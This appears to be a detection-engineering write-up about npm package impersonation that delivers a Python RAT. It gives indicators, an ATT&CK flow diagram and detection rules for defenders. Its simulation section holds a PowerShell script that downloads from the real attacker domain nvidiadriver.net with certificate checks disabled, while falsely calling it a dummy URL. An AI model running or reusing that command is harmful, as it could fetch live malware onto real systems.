Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Attackers are abusing npm package impersonation to spread a multi-stage Windows RAT. Malicious packages such as postcss-minify-selector-parser are presented as legitimate build utilities to compromise developer environments. Once triggered, the infection chain launches a PowerShell downloader that fetches a Nuitka-compiled Python RAT capable of stealing credentials and providing remote shell access.
Investigation
Researchers uncovered a cluster of malicious npm packages that reference legitimate dependencies to appear credible. The investigation mapped a layered infection chain that begins with a JavaScript dropper, advances to a PowerShell downloader, and ends with a sophisticated Python-based payload. By analyzing the Nuitka-compiled components, the researchers were able to reconstruct the RAT’s command-and-control protocol and supported commands.
Mitigation
Users should remove the identified malicious npm packages immediately and review dependency trees for any transitive exposure. Organizations should also block the known command-and-control domains and IP addresses. If compromise is suspected, developers should rotate browser-stored credentials and all development-related tokens without delay.
Response
Windows endpoints should be examined for artifacts such as %TEMP%\winPatch, %TEMP%\.store, and %TEMP%\.host. Investigators should also review persistence in the HKCU\Run registry key for the csshost value. A full audit of developer workstations should be conducted to identify unauthorized remote shell activity or signs of credential theft.
"graph TB %% Class Definitions classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef persistence fill:#99ff99 %% Node Definitions attack_supply_chain["<b>Technique</b> – <b>T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools</b><br/><b>Description</b>: Package impersonation on npm via lookalike packages such as postcss-minify-selector-parser.<br/><b>Target</b>: Developer environments"] class attack_supply_chain technique attack_user_execution["<b>Technique</b> – <b>T1204.005 User Execution: Malicious Library</b><br/><b>Description</b>: Triggered when the malicious npm package is imported.<br/><b>Action</b>: Executes an encoded JavaScript dropper."] class attack_user_execution technique process_powershell["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: PowerShell is used to write and execute the malicious script.<br/><b>File</b>: ../../settings.ps1"] class process_powershell technique attack_indicator_removal["<b>Technique</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/><b>Description</b>: Using a deceptive domain to download the payload.<br/><b>Domain</b>: nvidiadriver[.]net"] class attack_indicator_removal technique tool_cmd_shell["<b>Technique</b> – <b>T1059.003 Command and Scripting Interpreter: Windows Command Shell</b><br/><b>Description</b>: Used for extracting the payload bundle.<br/><b>Trigger</b>: Post-download execution."] class tool_cmd_shell technique malware_vbs_bootstrapper["<b>Malware</b> – <b>VBS Bootstrapper</b><br/><b>Description</b>: Launches the primary malware payload."] class malware_vbs_bootstrapper malware malware_rat["<b>Malware</b> – <b>Remote Access Tool (RAT)</b><br/><b>Description</b>: Python-based loader utilizing Nuitka-compiled modules.<br/><b>Functionality</b>: Provides remote access capabilities."] class malware_rat malware attack_persistence["<b>Technique</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/><b>Description</b>: Creates a registry value for persistence.<br/><b>Registry Value</b>: csshost"] class attack_persistence persistence attack_evasion["<b>Technique</b> – <b>T1497.001 Virtualization/Sandbox Evasion: System Checks</b><br/><b>Description</b>: Uses WMI queries to detect virtual environments.<br/><b>Command</b>: wmic bios get serialnumber"] class attack_evasion technique attack_c2["<b>Technique</b> – <b>T1219 Remote Access Tools</b><br/><b>Description</b>: Maintains communication with C2 server via encrypted POST packets.<br/><b>C2 Address</b>: hxxp[:]//95[.]216[.]92[.]207:8080"] class attack_c2 technique attack_credential_access["<b>Technique</b> – <b>T1555.003 Credentials from Password Stores: Credentials from Web Browsers</b><br/><b>Description</b>: Steals saved credentials from Chrome.<br/><b>Target Files</b>: Login Data and Local State"] class attack_credential_access technique %% Connections attack_supply_chain –>|leads_to| attack_user_execution attack_user_execution –>|executes| process_powershell process_powershell –>|performs| attack_indicator_removal attack_indicator_removal –>|triggers| tool_cmd_shell tool_cmd_shell –>|launches| malware_vbs_bootstrapper malware_vbs_bootstrapper –>|installs| malware_rat malware_rat –>|establishes| attack_persistence malware_rat –>|performs| attack_evasion malware_rat –>|communicates_via| attack_c2 malware_rat –>|exfiltrates| attack_credential_access "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
Suspicious CURL Usage (via cmdline)
View
Possible System Enumeration (via cmdline)
View
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
View
PowerShell Script Downloading Malicious Payload [Windows Powershell]
View
Detection of Malicious Network Connection Mimicking Legitimate Driver Download [Windows Network Connection]
View
Detection of Malicious PowerShell and Loader Script Execution [Windows Process Creation]
View
## Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary intends to establish a foothold on the system by masquerading as a legitimate software update process. To do this, they use PowerShell to invoke the native
curl.exeutility. By using the-k(insecure) flag, they bypass SSL certificate validation, and by specifying a destination path in$env:TEMPwith a filename likewinPatch.zip, they attempt to blend into the noise of routine system updates. The goal is to download a malicious payload that, once executed, provides remote access. -
Regression Test Script:
# Simulation script to trigger the specific detection rule # Note: This uses a dummy URL for safety, but mimics the exact structure required by the rule. $cmd = 'curl.exe -k -o "$env:TEMPwinPatch.zip" https://nvidiadriver.net/verv1432/winpatch-xd7d.win' Write-Host "Executing simulated malicious download command..." Invoke-Expression $cmd -
Cleanup Commands:
# Cleanup the downloaded dummy file if (Test-Path "$env:TEMPwinPatch.zip") { Remove-Item -Path "$env:TEMPwinPatch.zip" -Force Write-Host "Cleanup successful: Dummy file removed." } else { Write-Host "Cleanup: File not found." }